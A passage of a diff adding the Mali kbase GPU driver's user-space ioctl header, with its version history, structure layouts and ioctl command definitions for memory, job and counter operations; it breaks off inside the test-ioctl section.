+ * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and
+ * KBASE_IOCTL_STICKY_RESOURCE_UNMAP
+ * 11.4:
+ * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET
+ * 11.5:
+ * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD)
+ * 11.6:
+ * - Added flags field to base_jit_alloc_info structure, which can be used to
+ * specify pseudo chunked tiler alignment for JIT allocations.
+ * 11.7:
+ * - Removed UMP support
+ * 11.8:
+ * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags
+ * 11.9:
+ * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY
+ * under base_mem_alloc_flags
+ * 11.10:
+ * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for
+ * JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations
+ * with one softjob.
+ * 11.11:
+ * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags
+ * 11.12:
+ * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS
+ * 11.13:
+ * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT
+ * 11.14:
+ * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set
+ * under base_mem_alloc_flags
+ * 11.15:
+ * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags.
+ * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be
+ * passed to mmap().
+ * 11.16:
+ * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf.
+ * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for
+ * dma-buf. Now, buffers are mapped on GPU when first imported, no longer
+ * requiring external resource or sticky resource tracking. UNLESS,
+ * CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled.
+ * 11.17:
+ * - Added BASE_JD_REQ_JOB_SLOT.
+ * - Reused padding field in base_jd_atom_v2 to pass job slot number.
+ * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO
+ * 11.18:
+ * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags
+ * 11.19:
+ * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified.
+ * 11.20:
+ * - Added new phys_pages member to kbase_ioctl_mem_jit_init for
+ * KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2
+ * (replacing '_OLD') and _11_5 suffixes
+ * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in
+ * base_jd_atom_v2. It must currently be initialized to zero.
+ * - Added heap_info_gpu_addr to base_jit_alloc_info, and
+ * BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's
+ * flags member. Previous variants of this structure are kept and given _10_2
+ * and _11_5 suffixes.
+ * - The above changes are checked for safe values in usual builds
+ * 11.21:
+ * - v2.0 of mali_trace debugfs file, which now versions the file separately
+ * 11.22:
+ * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2.
+ * KBASE_IOCTL_JOB_SUBMIT supports both in parallel.
+ * 11.23:
+ * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify
+ * the physical memory backing of JIT allocations. This was not supposed
+ * to be a valid use case, but it was allowed by the previous implementation.
+ * 11.24:
+ * - Added a sysfs file 'serialize_jobs' inside a new sub-directory
+ * 'scheduling'.
+ * 11.25:
+ * - Enabled JIT pressure limit in base/kbase by default
+ * 11.26
+ * - Added kinstr_jm API
+ * 11.27
+ * - Backwards compatible extension to HWC ioctl.
+ * 11.28:
+ * - Added kernel side cache ops needed hint
+ * 11.29:
+ * - Reserve ioctl 52
+ * 11.30:
+ * - Add a new priority level BASE_JD_PRIO_REALTIME
+ * - Add ioctl 54: This controls the priority setting.
+ * 11.31:
+ * - Added BASE_JD_REQ_LIMITED_CORE_MASK.
+ * - Added ioctl 55: set_limited_core_count.
+ */
+#define BASE_UK_VERSION_MAJOR 11
+#define BASE_UK_VERSION_MINOR 31
+
+/* Job-manager (JM) ioctl definitions.  Note: the KBASE_IOCTL_* macros here
+ * use KBASE_IOCTL_TYPE, which is #defined later in this header — legal,
+ * since macro expansion happens at the use site of each KBASE_IOCTL_*. */
+/**
+ * struct kbase_ioctl_version_check - Check version compatibility between
+ * kernel and userspace
+ *
+ * @major: Major version number
+ * @minor: Minor version number
+ */
+struct kbase_ioctl_version_check {
+ __u16 major;
+ __u16 minor;
+};
+
+#define KBASE_IOCTL_VERSION_CHECK \
+ _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check)
+
+
+/**
+ * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel
+ *
+ * @addr: Memory address of an array of struct base_jd_atom_v2 or v3
+ * @nr_atoms: Number of entries in the array
+ * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom)
+ */
+struct kbase_ioctl_job_submit {
+ __u64 addr;
+ __u32 nr_atoms;
+ __u32 stride;
+};
+
+#define KBASE_IOCTL_JOB_SUBMIT \
+ _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit)
+
+/* Notify the kernel that the process is exiting (no payload). */
+#define KBASE_IOCTL_POST_TERM \
+ _IO(KBASE_IOCTL_TYPE, 4)
+
+/**
+ * struct kbase_ioctl_soft_event_update - Update the status of a soft-event
+ * @event: GPU address of the event which has been updated
+ * @new_status: The new status to set
+ * @flags: Flags for future expansion
+ */
+struct kbase_ioctl_soft_event_update {
+ __u64 event;
+ __u32 new_status;
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_SOFT_EVENT_UPDATE \
+ _IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update)
+
+/**
+ * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for
+ * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the
+ * kernel
+ *
+ * @size: The size of the `struct kbase_kinstr_jm_atom_state_change`
+ * @version: Represents a breaking change in the
+ * `struct kbase_kinstr_jm_atom_state_change`
+ * @padding: Explicit padding to get the structure up to 64bits. See
+ * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
+ *
+ * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the
+ * end of the structure that older user space might not understand. If the
+ * `version` is the same, the structure is still compatible with newer kernels.
+ * The `size` can be used to cast the opaque memory returned from the kernel.
+ */
+struct kbase_kinstr_jm_fd_out {
+ __u16 size;
+ __u8 version;
+ __u8 padding[5];
+};
+
+/**
+ * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor
+ *
+ * @count: Number of atom states that can be stored in the kernel circular
+ * buffer. Must be a power of two
+ * @padding: Explicit padding to get the structure up to 64bits. See
+ * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
+ */
+struct kbase_kinstr_jm_fd_in {
+ __u16 count;
+ __u8 padding[6];
+};
+
+/* in/out share storage: userspace fills `in`, the kernel replies via `out`. */
+union kbase_kinstr_jm_fd {
+ struct kbase_kinstr_jm_fd_in in;
+ struct kbase_kinstr_jm_fd_out out;
+};
+
+#define KBASE_IOCTL_KINSTR_JM_FD \
+ _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd)
+
+
+/* Command 52 is reserved (see version history 11.29). */
+#define KBASE_IOCTL_VERSION_CHECK_RESERVED \
+ _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check)
+
+/* ioctl "magic" type byte shared by all KBASE_IOCTL_* commands. */
+#define KBASE_IOCTL_TYPE 0x80
+
+/**
+ * struct kbase_ioctl_set_flags - Set kernel context creation flags
+ *
+ * @create_flags: Flags - see base_context_create_flags
+ */
+struct kbase_ioctl_set_flags {
+ __u32 create_flags;
+};
+
+#define KBASE_IOCTL_SET_FLAGS \
+ _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)
+
+/**
+ * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel
+ *
+ * @buffer: Pointer to the buffer to store properties into
+ * @size: Size of the buffer
+ * @flags: Flags - must be zero for now
+ *
+ * The ioctl will return the number of bytes stored into @buffer or an error
+ * on failure (e.g. @size is too small). If @size is specified as 0 then no
+ * data will be written but the return value will be the number of bytes needed
+ * for all the properties.
+ *
+ * @flags may be used in the future to request a different format for the
+ * buffer. With @flags == 0 the following format is used.
+ *
+ * The buffer will be filled with pairs of values, a __u32 key identifying the
+ * property followed by the value. The size of the value is identified using
+ * the bottom bits of the key. The value then immediately followed the key and
+ * is tightly packed (there is no padding). All keys and values are
+ * little-endian.
+ *
+ * 00 = __u8
+ * 01 = __u16
+ * 10 = __u32
+ * 11 = __u64
+ */
+struct kbase_ioctl_get_gpuprops {
+ __u64 buffer;
+ __u32 size;
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_GET_GPUPROPS \
+ _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops)
+
+/**
+ * union kbase_ioctl_mem_alloc - Allocate memory on the GPU
+ * @in: Input parameters
+ * @in.va_pages: The number of pages of virtual address space to reserve
+ * @in.commit_pages: The number of physical pages to allocate
+ * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region
+ * @in.flags: Flags
+ * @out: Output parameters
+ * @out.flags: Flags
+ * @out.gpu_va: The GPU virtual address which is allocated
+ */
+/* Page counts are in GPU pages (0x1000 bytes each). */
+union kbase_ioctl_mem_alloc {
+ struct {
+ __u64 va_pages;
+ __u64 commit_pages;
+ __u64 extension;
+ __u64 flags;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_ALLOC \
+ _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)
+
+/**
+ * struct kbase_ioctl_mem_query - Query properties of a GPU memory region
+ * @in: Input parameters
+ * @in.gpu_addr: A GPU address contained within the region
+ * @in.query: The type of query
+ * @out: Output parameters
+ * @out.value: The result of the query
+ *
+ * Use a %KBASE_MEM_QUERY_xxx flag as input for @query.
+ */
+union kbase_ioctl_mem_query {
+ struct {
+ __u64 gpu_addr;
+ __u64 query;
+ } in;
+ struct {
+ __u64 value;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_QUERY \
+ _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query)
+
+/* Valid values for kbase_ioctl_mem_query.in.query. */
+#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1)
+#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2)
+#define KBASE_MEM_QUERY_FLAGS ((__u64)3)
+
+/**
+ * struct kbase_ioctl_mem_free - Free a memory region
+ * @gpu_addr: Handle to the region to free
+ */
+struct kbase_ioctl_mem_free {
+ __u64 gpu_addr;
+};
+
+#define KBASE_IOCTL_MEM_FREE \
+ _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free)
+
+/* Hardware-counter (HWC) collection ioctls. */
+/**
+ * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader
+ * @buffer_count: requested number of dumping buffers
+ * @fe_bm: counters selection bitmask (Front end)
+ * @shader_bm: counters selection bitmask (Shader)
+ * @tiler_bm: counters selection bitmask (Tiler)
+ * @mmu_l2_bm: counters selection bitmask (MMU_L2)
+ *
+ * A fd is returned from the ioctl if successful, or a negative value on error
+ */
+struct kbase_ioctl_hwcnt_reader_setup {
+ __u32 buffer_count;
+ __u32 fe_bm;
+ __u32 shader_bm;
+ __u32 tiler_bm;
+ __u32 mmu_l2_bm;
+};
+
+#define KBASE_IOCTL_HWCNT_READER_SETUP \
+ _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup)
+
+/**
+ * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection
+ * @dump_buffer: GPU address to write counters to
+ * @fe_bm: counters selection bitmask (Front end)
+ * @shader_bm: counters selection bitmask (Shader)
+ * @tiler_bm: counters selection bitmask (Tiler)
+ * @mmu_l2_bm: counters selection bitmask (MMU_L2)
+ */
+struct kbase_ioctl_hwcnt_enable {
+ __u64 dump_buffer;
+ __u32 fe_bm;
+ __u32 shader_bm;
+ __u32 tiler_bm;
+ __u32 mmu_l2_bm;
+};
+
+#define KBASE_IOCTL_HWCNT_ENABLE \
+ _IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable)
+
+/* Payload-less HWC commands: trigger a dump / clear the counters. */
+#define KBASE_IOCTL_HWCNT_DUMP \
+ _IO(KBASE_IOCTL_TYPE, 10)
+
+#define KBASE_IOCTL_HWCNT_CLEAR \
+ _IO(KBASE_IOCTL_TYPE, 11)
+
+/**
+ * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to.
+ * @data: Counter samples for the dummy model.
+ * @size: Size of the counter sample data.
+ * @padding: Padding.
+ */
+struct kbase_ioctl_hwcnt_values {
+ __u64 data;
+ __u32 size;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_HWCNT_SET \
+ _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values)
+
+/**
+ * struct kbase_ioctl_disjoint_query - Query the disjoint counter
+ * @counter: A counter of disjoint events in the kernel
+ */
+struct kbase_ioctl_disjoint_query {
+ __u32 counter;
+};
+
+#define KBASE_IOCTL_DISJOINT_QUERY \
+ _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query)
+
+/**
+ * struct kbase_ioctl_get_ddk_version - Query the kernel version
+ * @version_buffer: Buffer to receive the kernel version string
+ * @size: Size of the buffer
+ * @padding: Padding
+ *
+ * The ioctl will return the number of bytes written into version_buffer
+ * (which includes a NULL byte) or a negative error code
+ *
+ * The ioctl request code has to be _IOW because the data in ioctl struct is
+ * being copied to the kernel, even though the kernel then writes out the
+ * version info to the buffer specified in the ioctl.
+ */
+struct kbase_ioctl_get_ddk_version {
+ __u64 version_buffer;
+ __u32 size;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_GET_DDK_VERSION \
+ _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version)
+
+/* The three MEM_JIT_INIT variants below all use command number 14; they
+ * differ only in struct size, which is encoded into the _IOW request value
+ * — presumably how the driver distinguishes them. NOTE(review): confirm. */
+/**
+ * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory
+ * allocator (between kernel driver
+ * version 10.2--11.4)
+ * @va_pages: Number of VA pages to reserve for JIT
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ *
+ * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
+ * backwards compatibility.
+ */
+struct kbase_ioctl_mem_jit_init_10_2 {
+ __u64 va_pages;
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2)
+
+/**
+ * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory
+ * allocator (between kernel driver
+ * version 11.5--11.19)
+ * @va_pages: Number of VA pages to reserve for JIT
+ * @max_allocations: Maximum number of concurrent allocations
+ * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
+ * @group_id: Group ID to be used for physical allocations
+ * @padding: Currently unused, must be zero
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ *
+ * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
+ * backwards compatibility.
+ */
+struct kbase_ioctl_mem_jit_init_11_5 {
+ __u64 va_pages;
+ __u8 max_allocations;
+ __u8 trim_level;
+ __u8 group_id;
+ __u8 padding[5];
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5)
+
+/**
+ * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory
+ * allocator
+ * @va_pages: Number of GPU virtual address pages to reserve for just-in-time
+ * memory allocations
+ * @max_allocations: Maximum number of concurrent allocations
+ * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
+ * @group_id: Group ID to be used for physical allocations
+ * @padding: Currently unused, must be zero
+ * @phys_pages: Maximum number of physical pages to allocate just-in-time
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ */
+/* Current (11.20+) variant; shares command number 14 with the legacy
+ * variants above. */
+struct kbase_ioctl_mem_jit_init {
+ __u64 va_pages;
+ __u8 max_allocations;
+ __u8 trim_level;
+ __u8 group_id;
+ __u8 padding[5];
+ __u64 phys_pages;
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init)
+
+/**
+ * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory
+ *
+ * @handle: GPU memory handle (GPU VA)
+ * @user_addr: The address where it is mapped in user space
+ * @size: The number of bytes to synchronise
+ * @type: The direction to synchronise: 0 is sync to memory (clean),
+ * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants.
+ * @padding: Padding to round up to a multiple of 8 bytes, must be zero
+ */
+struct kbase_ioctl_mem_sync {
+ __u64 handle;
+ __u64 user_addr;
+ __u64 size;
+ __u8 type;
+ __u8 padding[7];
+};
+
+#define KBASE_IOCTL_MEM_SYNC \
+ _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync)
+
+/**
+ * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer
+ *
+ * @in: Input parameters
+ * @in.gpu_addr: The GPU address of the memory region
+ * @in.cpu_addr: The CPU address to locate
+ * @in.size: A size in bytes to validate is contained within the region
+ * @out: Output parameters
+ * @out.offset: The offset from the start of the memory region to @cpu_addr
+ */
+union kbase_ioctl_mem_find_cpu_offset {
+ struct {
+ __u64 gpu_addr;
+ __u64 cpu_addr;
+ __u64 size;
+ } in;
+ struct {
+ __u64 offset;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \
+ _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset)
+
+/**
+ * struct kbase_ioctl_get_context_id - Get the kernel context ID
+ *
+ * @id: The kernel context ID
+ */
+struct kbase_ioctl_get_context_id {
+ __u32 id;
+};
+
+#define KBASE_IOCTL_GET_CONTEXT_ID \
+ _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id)
+
+/**
+ * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd
+ *
+ * @flags: Flags
+ *
+ * The ioctl returns a file descriptor when successful
+ */
+struct kbase_ioctl_tlstream_acquire {
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_TLSTREAM_ACQUIRE \
+ _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire)
+
+/* Flush the timeline stream (no payload). */
+#define KBASE_IOCTL_TLSTREAM_FLUSH \
+ _IO(KBASE_IOCTL_TYPE, 19)
+
+/**
+ * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region
+ *
+ * @gpu_addr: The memory region to modify
+ * @pages: The number of physical pages that should be present
+ *
+ * The ioctl may return on the following error codes or 0 for success:
+ * -ENOMEM: Out of memory
+ * -EINVAL: Invalid arguments
+ */
+struct kbase_ioctl_mem_commit {
+ __u64 gpu_addr;
+ __u64 pages;
+};
+
+#define KBASE_IOCTL_MEM_COMMIT \
+ _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit)
+
+/**
+ * union kbase_ioctl_mem_alias - Create an alias of memory regions
+ * @in: Input parameters
+ * @in.flags: Flags, see BASE_MEM_xxx
+ * @in.stride: Bytes between start of each memory region
+ * @in.nents: The number of regions to pack together into the alias
+ * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info
+ * @out: Output parameters
+ * @out.flags: Flags, see BASE_MEM_xxx
+ * @out.gpu_va: Address of the new alias
+ * @out.va_pages: Size of the new alias
+ */
+union kbase_ioctl_mem_alias {
+ struct {
+ __u64 flags;
+ __u64 stride;
+ __u64 nents;
+ __u64 aliasing_info;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ __u64 va_pages;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_ALIAS \
+ _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias)
+
+enum base_mem_import_type {
+ BASE_MEM_IMPORT_TYPE_INVALID = 0,
+ /*
+ * Import type with value 1 is deprecated.
+ */
+ BASE_MEM_IMPORT_TYPE_UMM = 2,
+ BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3
+};
+
+/**
+ * struct base_mem_import_user_buffer - Handle of an imported user buffer
+ *
+ * @ptr: address of imported user buffer
+ * @length: length of imported user buffer in bytes
+ *
+ * This structure is used to represent a handle of an imported user buffer.
+ */
+
+struct base_mem_import_user_buffer {
+ __u64 ptr;
+ __u64 length;
+};
+
+/**
+ * union kbase_ioctl_mem_import - Import memory for use by the GPU
+ * @in: Input parameters
+ * @in.flags: Flags, see BASE_MEM_xxx
+ * @in.phandle: Handle to the external memory
+ * @in.type: Type of external memory, see base_mem_import_type
+ * @in.padding: Amount of extra VA pages to append to the imported buffer
+ * @out: Output parameters
+ * @out.flags: Flags, see BASE_MEM_xxx
+ * @out.gpu_va: Address of the new alias
+ * @out.va_pages: Size of the new alias
+ */
+union kbase_ioctl_mem_import {
+ struct {
+ __u64 flags;
+ __u64 phandle;
+ __u32 type;
+ __u32 padding;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ __u64 va_pages;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_IMPORT \
+ _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import)
+
+/**
+ * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region
+ * @gpu_va: The GPU region to modify
+ * @flags: The new flags to set
+ * @mask: Mask of the flags to modify
+ */
+struct kbase_ioctl_mem_flags_change {
+ __u64 gpu_va;
+ __u64 flags;
+ __u64 mask;
+};
+
+#define KBASE_IOCTL_MEM_FLAGS_CHANGE \
+ _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change)
+
+/**
+ * struct kbase_ioctl_stream_create - Create a synchronisation stream
+ * @name: A name to identify this stream. Must be NULL-terminated.
+ *
+ * Note that this is also called a "timeline", but is named stream to avoid
+ * confusion with other uses of the word.
+ *
+ * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes.
+ *
+ * The ioctl returns a file descriptor.
+ */
+struct kbase_ioctl_stream_create {
+ char name[32];
+};
+
+#define KBASE_IOCTL_STREAM_CREATE \
+ _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create)
+
+/**
+ * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence
+ * @fd: The file descriptor to validate
+ */
+struct kbase_ioctl_fence_validate {
+ int fd;
+};
+
+#define KBASE_IOCTL_FENCE_VALIDATE \
+ _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate)
+
+/**
+ * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel
+ * @buffer: Pointer to the information
+ * @len: Length
+ * @padding: Padding
+ *
+ * The data provided is accessible through a debugfs file
+ */
+struct kbase_ioctl_mem_profile_add {
+ __u64 buffer;
+ __u32 len;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_MEM_PROFILE_ADD \
+ _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)
+
+/**
+ * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource
+ * @count: Number of resources
+ * @address: Array of __u64 GPU addresses of the external resources to map
+ */
+struct kbase_ioctl_sticky_resource_map {
+ __u64 count;
+ __u64 address;
+};
+
+#define KBASE_IOCTL_STICKY_RESOURCE_MAP \
+ _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map)
+
+/**
+ * struct kbase_ioctl_sticky_resource_unmap - Unmap a resource mapped which was
+ * previously permanently mapped
+ * @count: Number of resources
+ * @address: Array of __u64 GPU addresses of the external resources to unmap
+ */
+struct kbase_ioctl_sticky_resource_unmap {
+	__u64 count;
+	__u64 address;
+};
+
+#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \
+	_IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap)
+
+/**
+ * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of
+ * the GPU memory region for
+ * the given gpu address and
+ * the offset of that address
+ * into the region
+ * @in: Input parameters
+ * @in.gpu_addr: GPU virtual address
+ * @in.size: Size in bytes within the region
+ * @out: Output parameters
+ * @out.start: Address of the beginning of the memory region enclosing @gpu_addr
+ * for the length of @offset bytes
+ * @out.offset: The offset from the start of the memory region to @gpu_addr
+ */
+union kbase_ioctl_mem_find_gpu_start_and_offset {
+ struct {
+ __u64 gpu_addr;
+ __u64 size;
+ } in;
+ struct {
+ __u64 start;
+ __u64 offset;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \
+ _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset)
+
+#define KBASE_IOCTL_CINSTR_GWT_START \
+ _IO(KBASE_IOCTL_TYPE, 33)
+
+#define KBASE_IOCTL_CINSTR_GWT_STOP \
+ _IO(KBASE_IOCTL_TYPE, 34)
+
+/**
+ * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses.
+ * @in: Input parameters
+ * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas.
+ * @in.size_buffer: Address of buffer to hold size of modified areas (in pages)
+ * @in.len: Number of addresses the buffers can hold.
+ * @in.padding: padding
+ * @out: Output parameters
+ * @out.no_of_addr_collected: Number of addresses collected into addr_buffer.
+ * @out.more_data_available: Status indicating if more addresses are available.
+ * @out.padding: padding
+ *
+ * This structure is used when performing a call to dump GPU write fault
+ * addresses.
+ */
+union kbase_ioctl_cinstr_gwt_dump {
+ struct {
+ __u64 addr_buffer;
+ __u64 size_buffer;
+ __u32 len;
+ __u32 padding;
+
+ } in;
+ struct {
+ __u32 no_of_addr_collected;
+ __u8 more_data_available;
+ __u8 padding[27];
+ } out;
+};
+
+#define KBASE_IOCTL_CINSTR_GWT_DUMP \
+ _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump)
+
+/**
+ * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone
+ *
+ * @va_pages: Number of VA pages to reserve for EXEC_VA
+ */
+struct kbase_ioctl_mem_exec_init {
+ __u64 va_pages;
+};
+
+#define KBASE_IOCTL_MEM_EXEC_INIT \
+ _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init)
+
+/**
+ * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of
+ * cpu/gpu time (counter values)
+ * @in: Input parameters
+ * @in.request_flags: Bit-flags indicating the requested types.
+ * @in.paddings: Unused, size alignment matching the out.
+ * @out: Output parameters
+ * @out.sec: Integer field of the monotonic time, unit in seconds.
+ * @out.nsec: Fractional sec of the monotonic time, in nano-seconds.
+ * @out.padding: Unused, for __u64 alignment
+ * @out.timestamp: System wide timestamp (counter) value.
+ * @out.cycle_counter: GPU cycle counter value.
+ */
+union kbase_ioctl_get_cpu_gpu_timeinfo {
+ struct {
+ __u32 request_flags;
+ __u32 paddings[7];
+ } in;
+ struct {
+ __u64 sec;
+ __u32 nsec;
+ __u32 padding;
+ __u64 timestamp;
+ __u64 cycle_counter;
+ } out;
+};
+
+#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \
+ _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo)
+
+/**
+ * struct kbase_ioctl_context_priority_check - Check the max possible priority
+ * @priority: Input priority & output priority
+ */
+
+struct kbase_ioctl_context_priority_check {
+ __u8 priority;
+};
+
+#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \
+ _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check)
+
+/**
+ * struct kbase_ioctl_set_limited_core_count - Set the limited core count.
+ *
+ * @max_core_count: Maximum core count
+ */
+struct kbase_ioctl_set_limited_core_count {
+ __u8 max_core_count;
+};
+
+#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \
+ _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count)
+
+
+/***************
+ * Pixel ioctls *
+ ***************/
+
+/**
+ * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request
+ *
+ * @dur_usec: Duration for GPU to stay awake.
+ */
+struct kbase_ioctl_apc_request {
+ __u32 dur_usec;
+};
+
+#define KBASE_IOCTL_APC_REQUEST \
+ _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request)
+
+/***************
+ * test ioctls *
+ ***************/
+#if MALI_UNIT_TEST
+/* These ioctls are purely for test purposes and are not used in the production
+ * driver, they therefore may change without notice
+ */
+
+#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1)
+
+
+/**
+ * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes
+ * @bytes_collected: number of bytes read by user
+ * @bytes_generated: number of bytes generated by tracepoints
+ */
+struct kbase_ioctl_tlstream_stats {
